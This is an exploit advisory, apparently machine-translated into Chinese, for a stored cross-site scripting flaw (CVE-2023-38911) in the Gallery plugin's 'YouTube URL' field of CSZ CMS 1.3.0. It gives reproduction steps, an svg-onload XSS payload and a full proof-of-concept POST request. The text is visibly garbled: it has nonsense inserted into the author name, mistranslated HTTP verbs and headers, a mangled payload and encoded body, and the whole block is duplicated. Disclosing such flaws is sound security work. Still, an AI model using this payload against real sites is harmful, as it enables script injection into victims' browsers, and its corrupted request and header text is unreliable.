#利用标题: CSZ CMS 1.3.0-存储的跨站点脚本(插件'Gallery')
#日期: 2023/08/18
#CVE: CVE-2023-38911
#利用作者:丹尼尔马云惹不起马云冈萨雷斯
#供应商HomePage3360 https://www.cszcms.com/
#软件link: https://github.com/cskaza/cszcms
#版本: 1.3.0
#测试在: CSZ CMS 1.3.0
#Description:
#CSZ CMS 1.3.0受跨站点脚本(XSS)功能的影响,该功能允许攻击者通过在“画廊”部分输入并选择我们的画廊的精心设计的有效载荷执行任意Web脚本或HTML。以前创建的,在“ YouTube URL”字段中,此输入受XSS的影响。应该注意的是,以前在创建画廊时,“名称”字段很容易受到XSS的影响,但是在当前版本1.3.0中解决了这一点,发现的漏洞会影响创建画廊中的“ YouTube URL”字段。
#复制存储的XSS:的步骤
转到URL http://localhost/admin/plugin/Gallery/edit/2。
登录面板时,我们将转到“画廊”部分,然后创建一个轮播[http://localhost/admin/plugin/Galle...in/admin/plugin/plugin/gallery/gallery/edit/2]
我们编辑了我们创建的画廊,并看到我们可以将任意的Web脚本或HTML注入“ YouTube URL”字段。
使用以下有效载荷我们可以实现XSS
PAYLOAD:
divp title='/divsvg/onload=alert(document.domain)'
#POC请求:
发布http://localhost:8080/admin/plugin/gallery/addyoutube/2 http/1.1
HOST: LOCALHOST:8080
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:60.0)GECKE/20100101 FIREFOX/116.0ACCEPT: TEXT/HTML,应用程序/application/xhtml+xml+xml+xml; q=0.9,/xml;
Accept-Language: ES-ES,ES; Q=0.8,EN-US; q=0.5,en; q=0.3
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/Gallery/edit/2
升级- 不肯定- requests: 1
Gallery_Type=YouTubevideOsyOutube_url=%3CDIV%3E%3CP+标题%3D%22%22%2FDDIV%3E%3E%3CSVG%2fonload%3DALERT%3DALERT%28Document.Domain%29%29%3E%3E%22%3e%3ebmit=添加=添加
#日期: 2023/08/18
#CVE: CVE-2023-38911
#利用作者:丹尼尔马云惹不起马云冈萨雷斯
#供应商HomePage3360 https://www.cszcms.com/
#软件link: https://github.com/cskaza/cszcms
#版本: 1.3.0
#测试在: CSZ CMS 1.3.0
#Description:
#CSZ CMS 1.3.0受跨站点脚本(XSS)功能的影响,该功能允许攻击者通过在“画廊”部分输入并选择我们的画廊的精心设计的有效载荷执行任意Web脚本或HTML。以前创建的,在“ YouTube URL”字段中,此输入受XSS的影响。应该注意的是,以前在创建画廊时,“名称”字段很容易受到XSS的影响,但是在当前版本1.3.0中解决了这一点,发现的漏洞会影响创建画廊中的“ YouTube URL”字段。
#复制存储的XSS:的步骤
转到URL http://localhost/admin/plugin/Gallery/edit/2。
登录面板时,我们将转到“画廊”部分,然后创建一个轮播[http://localhost/admin/plugin/Galle...in/admin/plugin/plugin/gallery/gallery/edit/2]
我们编辑了我们创建的画廊,并看到我们可以将任意的Web脚本或HTML注入“ YouTube URL”字段。
使用以下有效载荷我们可以实现XSS
PAYLOAD:
divp title='/divsvg/onload=alert(document.domain)'
#POC请求:
发布http://localhost:8080/admin/plugin/gallery/addyoutube/2 http/1.1
HOST: LOCALHOST:8080
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:60.0)GECKE/20100101 FIREFOX/116.0ACCEPT: TEXT/HTML,应用程序/application/xhtml+xml+xml+xml; q=0.9,/xml;
Accept-Language: ES-ES,ES; Q=0.8,EN-US; q=0.5,en; q=0.3
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/Gallery/edit/2
升级- 不肯定- requests: 1
Gallery_Type=YouTubevideOsyOutube_url=%3CDIV%3E%3CP+标题%3D%22%22%2FDDIV%3E%3E%3CSVG%2fonload%3DALERT%3DALERT%28Document.Domain%29%29%3E%3E%22%3e%3ebmit=添加=添加
